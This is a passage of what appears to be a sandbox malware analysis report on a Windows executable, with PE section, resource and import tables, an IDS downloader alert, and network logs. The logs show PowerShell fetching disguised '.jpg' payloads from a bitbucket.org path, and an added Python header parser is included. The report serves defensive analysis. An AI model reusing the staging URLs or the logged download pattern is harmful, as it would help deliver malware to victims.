| .data | 0xc000 | 0x1f00 | 0x1000 | f198899505f620007167379f74f8141c | False | 0.083251953125 | data | 1.0384025678015962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0xe000 | 0x42c | 0x1000 | 2d9ecb32a70228f2b07b654e216a79ee | False | 0.156005859375 | data | 1.4378876073270839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0xf000 | 0x1ff2a | 0x20000 | 2c9a76bd28e5ad47d67b408069bdcbbe | False | 0.6653289794921875 | data | 6.62368679991532 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x2f000 | 0x2c | 0x1000 | cf22972a59e8c2a2ad0453d649f2025d | False | 0.017578125 | data | 0.10781936458684958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
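The header fields, link time, DLL characteristics and per-section entropies above all come straight from the PE headers. The Python script below is an added example, not code from the report or from Joe Sandbox, that walks those headers with the standard library only and applies the same checks: it converts TimeDateStamp and flags a value that lies after the analysis date, decodes the characteristics bit masks, computes Shannon entropy over each section's raw data, and lists any section that is both writable and executable (none here, which matches the section table). It runs on a constructed PE32+ image carrying the report's timestamp 0xE28C79B4, file characteristics and DLL characteristics, with a uniformly filled .text and a zero-filled .data; those section contents, and therefore the entropies and entry point it prints, are the example's assumptions rather than the sample's real sections.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

# Bit names from the PE/COFF specification (only the bits this example reports).
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
SECTION_FLAGS = {0x00000020: "CNT_CODE", 0x00000040: "CNT_INITIALIZED_DATA",
                 0x02000000: "MEM_DISCARDABLE", 0x20000000: "MEM_EXECUTE",
                 0x40000000: "MEM_READ", 0x80000000: "MEM_WRITE"}
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def timestamp_verdict(ts: int, now: datetime = None) -> str:
    """A link time after the analysis date cannot be a genuine build time."""
    now = now or datetime.now(timezone.utc)
    if ts == 0:
        return "zeroed"
    return "future" if EPOCH + timedelta(seconds=ts) > now else "plausible"


def parse_pe(data: bytes) -> dict:
    """Minimal header walk: DOS header -> PE signature -> COFF -> optional -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsect, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x20B:                                   # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:                                 # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsect):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, sflags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(data[raw_ptr:raw_ptr + raw_size]), 3),
                         "flags": flag_names(sflags, SECTION_FLAGS)})
    when = EPOCH + timedelta(seconds=ts)
    return {"machine": machine, "entry_point": image_base + entry_rva,
            "timestamp": ts, "timestamp_utc": when.strftime("%Y-%m-%d %H:%M:%S"),
            "timestamp_verdict": timestamp_verdict(ts),
            "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
            "subsystem": {2: "windows gui", 3: "windows cui"}.get(subsystem, str(subsystem)),
            "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
            "sections": sections,
            "wx_sections": [s["name"] for s in sections
                            if "MEM_EXECUTE" in s["flags"] and "MEM_WRITE" in s["flags"]]}


def build_sample_pe(timestamp: int = 0xE28C79B4) -> bytes:
    """Constructed PE32+ image (not the analysed sample) with the report's header
    flags and timestamp, a uniformly filled code section and a zeroed data section."""
    secs = [(b".text", 0x1000, bytes(range(256)) * 2, 0x60000020),   # CODE|EXECUTE|READ
            (b".data", 0x2000, b"\0" * 0x100, 0xC0000040)]           # IDATA|READ|WRITE
    file_align, e_lfanew, opt_size = 0x200, 0x40, 240
    raw_ptr = -(-(e_lfanew + 4 + 20 + opt_size + 40 * len(secs)) // file_align) * file_align
    out = [struct.pack("<2s58xI", b"MZ", e_lfanew), b"PE\0\0",
           struct.pack("<HHIIIHH", 0x8664, len(secs), timestamp, 0, 0, opt_size, 0x0022),
           struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, 0x200, 0x100, 0,
                       0x1000, 0x1000, 0x140000000, 0x1000, file_align, 10, 0, 10, 0, 10, 0,
                       0, 0x3000, raw_ptr, 0, 2, 0xC160, 0x100000, 0x1000, 0x100000, 0x1000,
                       0, 16) + bytes(128)]                           # 16 empty data directories
    body, ptr = b"", raw_ptr
    for name, va, raw, flags in secs:
        raw_size = -(-len(raw) // file_align) * file_align
        out.append(struct.pack("<8sIIIIIIHHI", name, len(raw), va, raw_size, ptr, 0, 0, 0, 0, flags))
        body += raw.ljust(raw_size, b"\0")
        ptr += raw_size
    return b"".join(out).ljust(raw_ptr, b"\0") + body


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    for key, value in info.items():
        print(f"{key}: {value}")
```

parse_pe(open(path, "rb").read()) works on the real file. A "future" verdict on its own is not proof of tampering: a linker run with /Brepro stores a hash of the image in TimeDateStamp instead of a build time, so weigh it together with the other signals on this page (unsigned image, the dropped batch file, the PowerShell activity).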
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xfac8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x128e4 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12f4c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13234 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1341c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13544 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x143ec | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14c94 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1535c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x158c4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x23298 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25840 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x268e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x27270 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_ICON | 0x276d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.32978723404255317
RT_ICON | 0x27b40 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.19394934333958724
RT_ICON | 0x28be8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.1354771784232365
RT_DIALOG | 0x2b190 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x2b484 | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x2b634 | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x2b79c | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x2b95c | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x2ba8c | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x2bbac | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x2bc38 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x2c158 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x2c724 | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2cbd4 | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x2d020 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x2d3f0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2d3f8 | 0xde6 | Microsoft Cabinet archive data, Windows 2000/XP setup, 3558 bytes, 1 file, at 0x2c +A "gam.bat", ID 666, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0030916245081507
RT_RCDATA | 0x2e1e0 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e1e4 | 0x24 | data | English | United States | 0.7777777777777778
RT_RCDATA | 0x2e208 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e210 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e218 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e21c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e224 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e228 | 0xf | ASCII text, with no line terminators | English | United States | 1.5333333333333334
RT_RCDATA | 0x2e238 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e23c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e240 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e248 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2e250 | 0x30 | data | | | 0.9166666666666666
RT_GROUP_ICON | 0x2e280 | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2e33c | 0x408 | data | English | United States | 0.42248062015503873
RT_MANIFEST | 0x2e744 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T19:04:55.491964+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49705 | 185.166.143.49 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 19:04:53.002674103 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.002710104 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:53.002826929 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.057089090 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.057116032 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:53.695092916 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:53.695177078 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.766855001 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.766890049 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:53.767249107 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:53.820209026 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.908698082 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:53.951423883 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194798946 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194812059 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194830894 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194838047 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194863081 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194878101 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194900036 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.194900036 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.194915056 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194928885 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.194937944 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.194964886 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.276596069 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.276684046 CEST | 443 | 49704 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.276773930 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.276773930 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.285245895 CEST | 49704 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.331137896 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.331244946 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:54.331355095 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.331629992 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:54.331666946 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.073693037 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.082010984 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:55.082056999 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.491982937 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.492012978 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.492027998 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.492109060 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:55.492132902 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.492147923 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:55.492178917 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:55.577543974 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.577619076 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:55.577625990 CEST | 443 | 49705 | 185.166.143.49 | 192.168.2.8
Oct 2, 2024 19:04:55.577668905 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Oct 2, 2024 19:04:55.578078985 CEST | 49705 | 443 | 192.168.2.8 | 185.166.143.49
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 19:04:52.988734961 CEST | 57818 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 19:04:52.995832920 CEST | 53 | 57818 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 19:04:52.988734961 CEST | 192.168.2.8 | 1.1.1.1 | 0xf74b | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 19:04:52.995832920 CEST | 1.1.1.1 | 192.168.2.8 | 0xf74b | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 19:04:52.995832920 CEST | 1.1.1.1 | 192.168.2.8 | 0xf74b | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 19:04:52.995832920 CEST | 1.1.1.1 | 192.168.2.8 | 0xf74b | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
• bitbucket.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 185.166.143.49 | 443 | 6592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 17:04:53 UTC | 110 | OUT | GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2024-10-02 17:04:54 UTC | 3988 | IN | HTTP/1.1 404 Not Found
Date: Wed, 02 Oct 2024 17:04:54 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15020
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "87058da896b55747ba4e6e46ed4a200d"
X-Dc-Location: Micros-3
X-Served-By: 52563790643d
X-Version: 3ff600212c86
X-Static-Version: 3ff600212c86
X-Request-Count: 3879
X-Render-Time: 0.10709047317504883
X-B3-Traceid: f9323d398cc148a7b6a0238c8cc639ad
X-B3-Spanid: 1a15bdc36336d4d5
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-5klEsQ+/lmMPaGnHlTQm6A=='; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.ser [TRUNCATED]
X-Usage-Quota-Remaining: 998379.615
X-Usage-Request-Cost: 1650.63
X-Usage-User-Time: 0.047510
X-Usage-System-Time: 0.002009
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Cache-Control: max-age=900
Age: 406
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: a9e52b1d8e51437387085773ed764a45
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=3,atl-edge-upstream;dur=91,atl-edge-pop;desc="aws-eu-central-1"
Connection: close
2024-10-02 17:04:54 UTC | 12396 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6b 6c 45 73 51 2b 2f 6c 6d 4d 50 61 47 6e 48 6c 54 51 6d 36 41 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="5klEsQ+/lmMPaGnHlTQm6A==">if (wind
2024-10-02 17:04:54 UTC | 2624 | IN | Data Raw: 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 64 65 70 6c 6f 79 6d 65 6e 74 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 72 75 6e 6e 65 72 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 72 2d 64 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 20 66 61 6c 73 65 2c 20 22 63 6f 6d 6d 69 74 2d 65 78 70 61 6e 64 2d 69 6e 6e 6f 22 3a 20 66 61 6c 73 65 2c 20 22 73 79 6e 74 61 78 2d 68 69 67 68 6c 69 67 68 74 69 6e 67 22 3a 20 66 61 6c 73 65 2c 20 22 63 72 65 61 74 65 2d 77 6f 72 6b 73 70 61 63 65 2d 73 68 6f 77 2d 72 65 63 61 70 74 63 68 61 22
Data Ascii: i-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptcha"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49705 | 185.166.143.49 | 443 | 6592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 17:04:55 UTC | 87 | OUT | GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1
Host: bitbucket.org
2024-10-02 17:04:55 UTC | 3986 | IN | HTTP/1.1 404 Not Found
Date: Wed, 02 Oct 2024 17:04:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15023
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "d262e8bacb3f21ca001bdceb1cfc66a0"
X-Dc-Location: Micros-3
X-Served-By: c1d37df8df76
X-Version: 3ff600212c86
X-Static-Version: 3ff600212c86
X-Request-Count: 461
X-Render-Time: 0.09731030464172363
X-B3-Traceid: 8ba6f34777ac4d28bfc0b737ee6a4d2f
X-B3-Spanid: 9c57bf6c5c877b71
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-y+F3Ri7t30+2yS3vrtRQPg=='; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.pro [TRUNCATED]
                                                                                        X-Usage-Quota-Remaining: 997696.229
                                                                                        X-Usage-Request-Cost: 1570.30
                                                                                        X-Usage-User-Time: 0.038994
                                                                                        X-Usage-System-Time: 0.008115
